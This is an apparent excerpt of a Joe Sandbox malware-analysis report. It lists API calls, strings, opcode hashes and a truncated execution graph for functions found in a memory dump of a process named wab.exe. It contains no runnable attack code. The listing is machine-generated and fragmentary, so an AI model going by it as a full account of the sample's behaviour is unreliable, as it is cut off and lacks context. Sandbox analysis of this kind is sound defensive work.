                                • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                APIs
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                • malloc.MSVCRT ref: 00417407
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$??3@malloc
                                • String ID:
                                • API String ID: 4284152360-0
                                • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                APIs
                                • memset.MSVCRT ref: 0040F673
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                • strlen.MSVCRT ref: 0040F6A2
                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                • String ID:
                                • API String ID: 2754987064-0
                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                APIs
                                • memset.MSVCRT ref: 0040F6E2
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                • strlen.MSVCRT ref: 0040F70D
                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                • String ID:
                                • API String ID: 2754987064-0
                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                APIs
                                • memset.MSVCRT ref: 00402FD7
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                • strlen.MSVCRT ref: 00403006
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                • String ID:
                                • API String ID: 2754987064-0
                                • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                APIs
                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                • String ID:
                                • API String ID: 764393265-0
                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                APIs
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Time$System$File$LocalSpecific
                                • String ID:
                                • API String ID: 979780441-0
                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                APIs
                                • memcpy.MSVCRT ref: 004134E0
                                • memcpy.MSVCRT ref: 004134F2
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$DialogHandleModuleParam
                                • String ID:
                                • API String ID: 1386444988-0
                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                APIs
                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: InvalidateMessageRectSend
                                • String ID: d=E
                                • API String ID: 909852535-3703654223
                                • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                APIs
                                • wcschr.MSVCRT ref: 0040F79E
                                • wcschr.MSVCRT ref: 0040F7AC
                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcschr$memcpywcslen
                                • String ID: "
                                • API String ID: 1983396471-123907689
                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                APIs
                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                • _memicmp.MSVCRT ref: 0040C00D
                                • memcpy.MSVCRT ref: 0040C024
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FilePointer_memicmpmemcpy
                                • String ID: URL
                                • API String ID: 2108176848-3574463123
                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintfmemcpy
                                • String ID: %2.2X
                                • API String ID: 2789212964-323797159
                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintf
                                • String ID: %%-%d.%ds
                                • API String ID: 3988819677-2008345750
                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                APIs
                                • memset.MSVCRT ref: 0040E770
                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSendmemset
                                • String ID: F^@
                                • API String ID: 568519121-3652327722
                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: PlacementWindowmemset
                                • String ID: WinPos
                                • API String ID: 4036792311-2823255486
                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                APIs
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                • wcsrchr.MSVCRT ref: 0040DCE9
                                • wcscat.MSVCRT ref: 0040DCFF
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileModuleNamewcscatwcsrchr
                                • String ID: _lng.ini
                                • API String ID: 383090722-1948609170
                                • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                • API String ID: 2773794195-880857682
                                • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID:
                                • API String ID: 438689982-0
                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$memset
                                • String ID:
                                • API String ID: 1860491036-0
                                • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                APIs
                                • memcmp.MSVCRT ref: 00408AF3
                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                • memcmp.MSVCRT ref: 00408B2B
                                • memcmp.MSVCRT ref: 00408B5C
                                • memcpy.MSVCRT ref: 00408B79
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmp$memcpy
                                • String ID:
                                • API String ID: 231171946-0
                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcslen$wcscat$wcscpy
                                • String ID:
                                • API String ID: 1961120804-0
                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                Execution Graph

                                Execution Coverage:2.4%
                                Dynamic/Decrypted Code Coverage:20.3%
                                Signature Coverage:0.5%
                                Total number of Nodes:848
                                Total number of Limit Nodes:16
                                execution_graph 34120 40fc40 70 API calls 34294 403640 21 API calls 34121 427fa4 42 API calls 34295 412e43 _endthreadex 34296 425115 76 API calls __fprintf_l 34297 43fe40 133 API calls 34124 425115 83 API calls __fprintf_l 34125 401445 memcpy memcpy DialogBoxParamA 34126 440c40 34 API calls 33252 444c4a 33271 444e38 33252->33271 33254 444c56 GetModuleHandleA 33255 444c68 __set_app_type __p__fmode __p__commode 33254->33255 33257 444cfa 33255->33257 33258 444d02 __setusermatherr 33257->33258 33259 444d0e 33257->33259 33258->33259 33272 444e22 _controlfp 33259->33272 33261 444d13 _initterm __getmainargs _initterm 33262 444d6a GetStartupInfoA 33261->33262 33264 444d9e GetModuleHandleA 33262->33264 33273 40cf44 33264->33273 33268 444dcf _cexit 33270 444e04 33268->33270 33269 444dc8 exit 33269->33268 33271->33254 33272->33261 33324 404a99 LoadLibraryA 33273->33324 33275 40cf64 33275->33268 33275->33269 33276 40cf60 33276->33275 33331 410d0e 33276->33331 33278 40cf6f 33335 40ccd7 ??2@YAPAXI 33278->33335 33280 40cf9b 33349 407cbc 33280->33349 33285 40cfc4 33367 409825 memset 33285->33367 33286 40cfd8 33372 4096f4 memset 33286->33372 33291 407e30 _strcmpi 33293 40cfee 33291->33293 33292 40d181 ??3@YAXPAX 33294 40d1b3 33292->33294 33295 40d19f DeleteObject 33292->33295 33297 40cff2 RegDeleteKeyA 33293->33297 33298 40d007 EnumResourceTypesA 33293->33298 33396 407948 ??3@YAXPAX ??3@YAXPAX 33294->33396 33295->33294 33297->33292 33300 40d047 33298->33300 33301 40d02f MessageBoxA 33298->33301 33299 40d1c4 33397 4080d4 ??3@YAXPAX 33299->33397 33303 40d0a0 CoInitialize 33300->33303 33377 40ce70 33300->33377 33301->33292 33394 40cc26 strncat memset RegisterClassA CreateWindowExA 33303->33394 33304 40d1cd 33398 407948 ??3@YAXPAX ??3@YAXPAX 33304->33398 33309 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33395 40c256 PostMessageA 33309->33395 33311 40d061 ??3@YAXPAX 33311->33294 33314 40d084 DeleteObject 33311->33314 33312 40d09e 33312->33303 33314->33294 33316 40d0f9 GetMessageA 33317 40d17b 33316->33317 33318 40d10d 33316->33318 33317->33292 33319 40d113 TranslateAccelerator 33318->33319 33321 40d145 IsDialogMessage 33318->33321 33322 40d139 IsDialogMessage 33318->33322 33319->33318 33320 40d16d GetMessageA 33319->33320 33320->33317 33320->33319 33321->33320 33323 40d157 TranslateMessage DispatchMessageA 33321->33323 33322->33320 33322->33321 33323->33320 33325 404ac4 GetProcAddress 33324->33325 33327 404ae8 33324->33327 33326 404add FreeLibrary 33325->33326 33328 404ad4 33325->33328 33326->33327 33329 404b13 33327->33329 33330 404afc MessageBoxA 33327->33330 33328->33326 33329->33276 33330->33276 33332 410d17 LoadLibraryA 33331->33332 33333 410d3c 33331->33333 33332->33333 33334 410d2b GetProcAddress 33332->33334 33333->33278 33334->33333 33336 40cd08 ??2@YAPAXI 33335->33336 33338 40cd26 33336->33338 33340 40cd2d 33336->33340 33406 404025 6 API calls 33338->33406 33341 40cd66 33340->33341 33342 40cd59 DeleteObject 33340->33342 33399 407088 33341->33399 33342->33341 33344 40cd6b 33402 4019b5 33344->33402 33347 4019b5 strncat 33348 40cdbf _mbscpy 33347->33348 33348->33280 33408 407948 ??3@YAXPAX ??3@YAXPAX 33349->33408 33353 407ddc 33362 407e04 33353->33362 33421 407a1f 33353->33421 33354 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33360 407cf7 33354->33360 33356 407d7a ??3@YAXPAX 33356->33360 33360->33353 33360->33354 33360->33356 33360->33362 33412 40796e 7 API calls 33360->33412 33413 406f30 33360->33413 33409 407a55 33362->33409 33363 407e30 33364 407e57 33363->33364 33366 407e38 33363->33366 33364->33285 33364->33286 33365 407e41 _strcmpi 33365->33364 33365->33366 33366->33364 33366->33365 33427 4097ff 33367->33427 33369 409854 33432 409731 33369->33432 33373 4097ff 3 API calls 33372->33373 33374 409723 33373->33374 33452 40966c 33374->33452 33466 4023b2 33377->33466 33383 40ced3 33555 40cdda 7 API calls 33383->33555 33384 40cece 33387 40cf3f 33384->33387 33507 40c3d0 memset GetModuleFileNameA strrchr 33384->33507 33387->33311 33387->33312 33390 40ceed 33534 40affa 33390->33534 33394->33309 33395->33316 33396->33299 33397->33304 33398->33275 33407 406fc7 memset _mbscpy 33399->33407 33401 40709f CreateFontIndirectA 33401->33344 33403 4019e1 33402->33403 33404 4019c2 strncat 33403->33404 33405 4019e5 memset LoadIconA 33403->33405 33404->33403 33405->33347 33406->33340 33407->33401 33408->33360 33410 407a65 33409->33410 33411 407a5b ??3@YAXPAX 33409->33411 33410->33363 33411->33410 33412->33360 33414 406f37 malloc 33413->33414 33415 406f7d 33413->33415 33417 406f73 33414->33417 33418 406f58 33414->33418 33415->33360 33417->33360 33419 406f6c ??3@YAXPAX 33418->33419 33420 406f5c memcpy 33418->33420 33419->33417 33420->33419 33422 407a38 33421->33422 33423 407a2d ??3@YAXPAX 33421->33423 33425 406f30 3 API calls 33422->33425 33424 407a43 33423->33424 33426 40796e 7 API calls 33424->33426 33425->33424 33426->33362 33443 406f96 GetModuleFileNameA 33427->33443 33429 409805 strrchr 33430 409814 33429->33430 33431 409817 _mbscat 33429->33431 33430->33431 33431->33369 33444 44b090 33432->33444 33437 40930c 3 API calls 33438 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33437->33438 33439 4097c5 LoadStringA 33438->33439 33442 4097db 33439->33442 33441 4097f3 33441->33292 33442->33439 33442->33441 33451 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33442->33451 33443->33429 33445 40973e _mbscpy _mbscpy 33444->33445 33446 40930c 33445->33446 33447 44b090 33446->33447 33448 409319 memset GetPrivateProfileStringA 33447->33448 33449 409374 33448->33449 33450 409364 WritePrivateProfileStringA 33448->33450 33449->33437 33450->33449 33451->33442 33462 406f81 GetFileAttributesA 33452->33462 33454 409675 33455 4096ee 33454->33455 33456 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33454->33456 33455->33291 33463 409278 GetPrivateProfileStringA 33456->33463 33458 4096c9 33464 409278 GetPrivateProfileStringA 33458->33464 33460 4096da 33465 409278 GetPrivateProfileStringA 33460->33465 33462->33454 33463->33458 33464->33460 33465->33455 33557 409c1c 33466->33557 33469 401e69 memset 33596 410dbb 33469->33596 33472 401ec2 33626 4070e3 strlen _mbscat _mbscpy _mbscat 33472->33626 33473 401ed4 33611 406f81 GetFileAttributesA 33473->33611 33476 401ee6 strlen strlen 33478 401f15 33476->33478 33479 401f28 33476->33479 33627 4070e3 strlen _mbscat _mbscpy _mbscat 33478->33627 33612 406f81 GetFileAttributesA 33479->33612 33482 401f35 33613 401c31 33482->33613 33485 401f75 33625 410a9c RegOpenKeyExA 33485->33625 33486 401c31 7 API calls 33486->33485 33488 401f91 33489 402187 33488->33489 33490 401f9c memset 33488->33490 33492 402195 ExpandEnvironmentStringsA 33489->33492 33493 4021a8 _strcmpi 33489->33493 33628 410b62 RegEnumKeyExA 33490->33628 33637 406f81 GetFileAttributesA 33492->33637 33493->33383 33493->33384 33495 40217e RegCloseKey 33495->33489 33496 401fd9 atoi 33497 